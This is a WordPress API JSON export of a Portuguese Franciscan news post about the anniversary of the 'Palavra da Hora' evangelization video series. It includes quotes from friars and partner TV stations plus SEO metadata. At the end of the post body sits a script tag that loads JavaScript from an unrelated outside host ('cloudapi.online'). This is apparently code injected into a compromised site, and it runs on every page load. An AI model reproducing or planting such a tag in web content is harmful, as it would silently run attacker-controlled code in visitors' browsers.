{"id":159702,"date":"2018-05-20T08:22:31","date_gmt":"2018-05-20T11:22:31","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=159702"},"modified":"2019-08-23T11:00:51","modified_gmt":"2019-08-23T14:00:51","slug":"palavra-da-hora-um-jeito-novo-de-evangelizar","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html","title":{"rendered":"&#8220;Palavra da Hora&#8221;, um jeito novo de evangelizar"},"content":{"rendered":"<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/GCTQt2wuqP8\" width=\"100%\" height=\"480\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><strong>Frei Augusto Luiz Gabriel<\/strong><\/p>\n<p><strong>S\u00e3o Paulo (SP) &#8211;<\/strong> Desde que foi inaugurada, h\u00e1 exatamente dois anos, a s\u00e9rie <em>Palavra da Hora<\/em> j\u00e1 apresentou mais de 500 v\u00eddeos com temas desde a espiritualidade franciscana at\u00e9 assuntos relacionados \u00e0 fam\u00edlia. O programa \u00e9 uma iniciativa da <a href=\"http:\/\/youtube.com\/c\/tvfranciscanos\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Web TvFranciscanos<\/strong><\/a>, da Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o que, em parceira com a Rede Celinauta de Comunica\u00e7\u00e3o de Pato Branco (PR) e a TV Kefas do Governador Valadares (MG), exibe de segunda a sexta os v\u00eddeos em seus ve\u00edculos de comunica\u00e7\u00e3o.<\/p>\n<p>Para Frei Gustavo Medella, coordenador da Frente de Evangeliza\u00e7\u00e3o da Comunica\u00e7\u00e3o, o Programa Palavra da Hora traz em si as caracter\u00edsticas da evangeliza\u00e7\u00e3o franciscana. Uma mensagem simples, direta e pautada no Evangelho. \u201cA proposta \u00e9 oferecer a quem assiste uma ocasi\u00e3o para se tornar uma pessoa melhor. Agrade\u00e7o aos confrades que neste dois anos se empenharam em participar desta iniciativa evangelizadora. Tamb\u00e9m destaco a parceria e a colabora\u00e7\u00e3o da TV Kefas, de Governador Valadares, que, com fidelidade, tem transmitido nosso conte\u00fado ao querido povo do leste de Minas Gerais&#8221;, destacou o frade.<\/p>\n<p>Frei Neuri Reinisch, diretor da Rede Celinauta de Comunica\u00e7\u00e3o de Pato Branco (PR), ressaltou que o novo visual do programa ficou muito bom. \u201cGostei! Ficou \u00f3timo. Com certeza devemos continuar com esse projeto de evangeliza\u00e7\u00e3o que apresenta uma mensagem r\u00e1pida e bastante positiva. Isso \u00e9 muito interessante e, com toda a certeza, contribui muito para a nossa programa\u00e7\u00e3o di\u00e1ria\u201d. Frei Neuri coordena os trabalhos na TV Sudoeste (PR), emissora que contribui ativamente na produ\u00e7\u00e3o, edi\u00e7\u00e3o e divulga\u00e7\u00e3o do material diariamente. Empolgado com a novidade adiantou: \u201cDentro deste estilo tamb\u00e9m estamos pensando em um novo projeto que queremos desenvolver no futuro que \u00e9 o quadro:<em> Minuto Fam\u00edlia<\/em>\u201d, salientou.<\/p>\n<p>M\u00e1rcio Farias, jornalista e diretor de conte\u00fado da TV Kefas, afirma que o programa possui uma grande repercuss\u00e3o na audi\u00eancia da TV. \u201cEle traz uma mensagem r\u00e1pida e objetiva que alcan\u00e7a todo nosso p\u00fablico. Como vai ao ar em oito edi\u00e7\u00f5es durante todo o dia, alcan\u00e7a telespectadores de diversas idades e par\u00f3quias. Sempre h\u00e1 mensagens pelas redes sociais e liga\u00e7\u00f5es de pessoas que nos questionam quando retransmitimos alguns v\u00eddeos\u201d, sublinhou.<\/p>\n<p>Diariamente, os v\u00eddeos da Palavra da Hora t\u00eam a miss\u00e3o de levar mensagens de reflex\u00e3o e orienta\u00e7\u00e3o sobre temas do cotidiano. E, neste m\u00eas de maio, anivers\u00e1rio do programa, apresentamos a partir de hoje (21\/05) uma configura\u00e7\u00e3o nova nos v\u00eddeos. Com um formato diferente, os programas continuar\u00e3o a oferecer um encontro di\u00e1rio com uma mensagem de enriquecimento espiritual, tendo em vista os valores e as virtudes de S\u00e3o Francisco de Assis. Acompanhe e compartilhe com seus amigos e familiares!<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Web TV Franciscanos<\/p>\n","protected":false},"author":5,"featured_media":192908,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[571,257],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>&quot;Palavra da Hora&quot;, um jeito novo de evangelizar - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"&quot;Palavra da Hora&quot;, um jeito novo de evangelizar - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Web TV Franciscanos\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-20T11:22:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-23T14:00:51+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/palavra_hora.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"freiaugusto\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"freiaugusto\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/palavra_hora.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/palavra_hora.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html\",\"name\":\"\\\"Palavra da Hora\\\", um jeito novo de evangelizar - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#primaryimage\"},\"datePublished\":\"2018-05-20T11:22:31+00:00\",\"dateModified\":\"2019-08-23T14:00:51+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"&#8220;Palavra da Hora&#8221;, um jeito novo de evangelizar\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\",\"name\":\"freiaugusto\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"caption\":\"freiaugusto\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\"Palavra da Hora\", um jeito novo de evangelizar - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html","og_locale":"pt_BR","og_type":"article","og_title":"\"Palavra da Hora\", um jeito novo de evangelizar - Not\u00edcias - Franciscanos","og_description":"Web TV Franciscanos","og_url":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-20T11:22:31+00:00","article_modified_time":"2019-08-23T14:00:51+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/palavra_hora.jpg","type":"image\/jpeg"}],"author":"freiaugusto","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"freiaugusto","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/palavra_hora.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/palavra_hora.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html","name":"\"Palavra da Hora\", um jeito novo de evangelizar - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#primaryimage"},"datePublished":"2018-05-20T11:22:31+00:00","dateModified":"2019-08-23T14:00:51+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/palavra-da-hora-um-jeito-novo-de-evangelizar.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"&#8220;Palavra da Hora&#8221;, um jeito novo de evangelizar"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91","name":"freiaugusto","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","caption":"freiaugusto"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159702"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=159702"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159702\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/192908"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=159702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=159702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=159702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}